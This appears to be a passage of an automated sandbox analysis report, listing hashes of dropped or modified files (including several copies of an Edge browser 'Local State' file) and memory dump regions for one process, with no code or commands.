                                                      MD5

                                                      2f4cf74d2551f0ebce9653de9ad89ed3

                                                      SHA1

                                                      1edec1108ee71d518299c4d65a1866c2cdede8e7

                                                      SHA256

                                                      86cb05cd0a01fcaada107f4f348a015c0730da914ff269c33bbf199c4227bce3

                                                      SHA512

                                                      e31aa932bbfc671ece979f4809cdb506916823fc86b1c948594afbc28f35dc255b0673c9a02cade72d287d641422a38bad2d24b14eef9d916a64d6ae26017470

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                      Filesize

                                                      8KB

                                                      MD5

                                                      66615914ed8ed75d117cfe2d4d815018

                                                      SHA1

                                                      c198d723c916c3301df04d9aeb5a8b1eb8b007fd

                                                      SHA256

                                                      82e07f7a739eb2c83abe444a297cfdb57a7be61ee93528a8ea9fa12d8dba7e49

                                                      SHA512

                                                      3c7f40e8cf03f226e56593b3ea145f2f22b7daaad787464bf063e423f74ac4c36a6477e0cacb689f5a4cc5e9588e9cc3d2b57af19b3902142d543373ead70112

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                      Filesize

                                                      10KB

                                                      MD5

                                                      e6ba70e9a402724aad6e2113662f7a6a

                                                      SHA1

                                                      57fc6b5e1f8f6548ac11e3533b751073bcc0fc35

                                                      SHA256

                                                      794de8d7b64520b0f5d69c051d08f71f766600e08aca9a7ccc81ab6eed35bcc0

                                                      SHA512

                                                      0c37ee3dae943931ca8ec520138d058c4f412ff59e0b8f6b5e1ff3a3ae4de084d08206e71dd74aed463fffc1ed362b84c8f6fe72ce2071e08bebe0cea5f5ece8

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                      Filesize

                                                      10KB

                                                      MD5

                                                      4f4157a06299d52baafe5ca34adb72b8

                                                      SHA1

                                                      2d6edd4886f05b75cb5d367c8a54e7279007be94

                                                      SHA256

                                                      6721999c5e69815a76f17a82f172f50f2ae216bda74e69d1e42f2fd518a90c8c

                                                      SHA512

                                                      a87d9b8c78ea266ce2300a34f8c5de0dc13cf54c95112846bc835aad69f8bf08890d2999cc3c94bce6f58b5d90f48f34ae88a5368b71e64dc05ec7a24e0e088f

                                                    • memory/276-29-0x0000000006A20000-0x0000000006A32000-memory.dmp

                                                      Filesize

                                                      72KB

                                                    • memory/276-53-0x0000000008AD0000-0x0000000008AE5000-memory.dmp

                                                      Filesize

                                                      84KB

                                                    • memory/276-49-0x0000000006A80000-0x0000000006A9F000-memory.dmp

                                                      Filesize

                                                      124KB

                                                    • memory/276-48-0x0000000006AA0000-0x0000000006ADA000-memory.dmp

                                                      Filesize

                                                      232KB

                                                    • memory/276-44-0x0000000006A40000-0x0000000006A46000-memory.dmp

                                                      Filesize

                                                      24KB

                                                    • memory/276-40-0x000000000B2D0000-0x000000000B384000-memory.dmp

                                                      Filesize

                                                      720KB

                                                    • memory/276-37-0x000000000B2D0000-0x000000000B384000-memory.dmp

                                                      Filesize

                                                      720KB

                                                    • memory/276-36-0x00000000067A0000-0x00000000067AC000-memory.dmp

                                                      Filesize

                                                      48KB

                                                    • memory/276-33-0x00000000067A0000-0x00000000067AC000-memory.dmp

                                                      Filesize

                                                      48KB

                                                    • memory/276-41-0x0000000006A40000-0x0000000006A46000-memory.dmp

                                                      Filesize

                                                      24KB

                                                    • memory/276-25-0x00000000069F0000-0x0000000006A18000-memory.dmp

                                                      Filesize

                                                      160KB

                                                    • memory/276-28-0x00000000069F0000-0x0000000006A18000-memory.dmp

                                                      Filesize

                                                      160KB

                                                    • memory/276-21-0x0000000006990000-0x00000000069B3000-memory.dmp

                                                      Filesize

                                                      140KB

                                                    • memory/276-20-0x0000000006970000-0x0000000006983000-memory.dmp

                                                      Filesize

                                                      76KB

                                                    • memory/276-17-0x0000000006970000-0x0000000006983000-memory.dmp

                                                      Filesize

                                                      76KB

                                                    • memory/276-52-0x0000000006A80000-0x0000000006A9F000-memory.dmp

                                                      Filesize

                                                      124KB

                                                    • memory/276-59-0x00000000005F4000-0x00000000005F5000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/276-56-0x0000000008AD0000-0x0000000008AE5000-memory.dmp

                                                      Filesize

                                                      84KB

                                                    • memory/276-45-0x0000000006AA0000-0x0000000006ADA000-memory.dmp

                                                      Filesize

                                                      232KB

                                                    • memory/276-0-0x00000000005F4000-0x00000000005F5000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/276-32-0x0000000006A20000-0x0000000006A32000-memory.dmp

                                                      Filesize

                                                      72KB

                                                    • memory/276-24-0x0000000006990000-0x00000000069B3000-memory.dmp

                                                      Filesize

                                                      140KB

                                                    • memory/276-8-0x0000000008B00000-0x00000000096E9000-memory.dmp

                                                      Filesize

                                                      11.9MB

                                                    • memory/276-5-0x0000000008B00000-0x00000000096E9000-memory.dmp

                                                      Filesize

                                                      11.9MB

                                                    • memory/276-12-0x0000000006730000-0x0000000006770000-memory.dmp

                                                      Filesize

                                                      256KB

                                                    • memory/276-13-0x0000000006700000-0x0000000006711000-memory.dmp

                                                      Filesize

                                                      68KB

                                                    • memory/276-16-0x0000000006700000-0x0000000006711000-memory.dmp

                                                      Filesize

                                                      68KB

                                                    • memory/276-9-0x0000000006730000-0x0000000006770000-memory.dmp

                                                      Filesize

                                                      256KB

                                                    • memory/276-4-0x0000000006E00000-0x000000000778A000-memory.dmp

                                                      Filesize

                                                      9.5MB

                                                    • memory/276-1-0x0000000006E00000-0x000000000778A000-memory.dmp

                                                      Filesize

                                                      9.5MB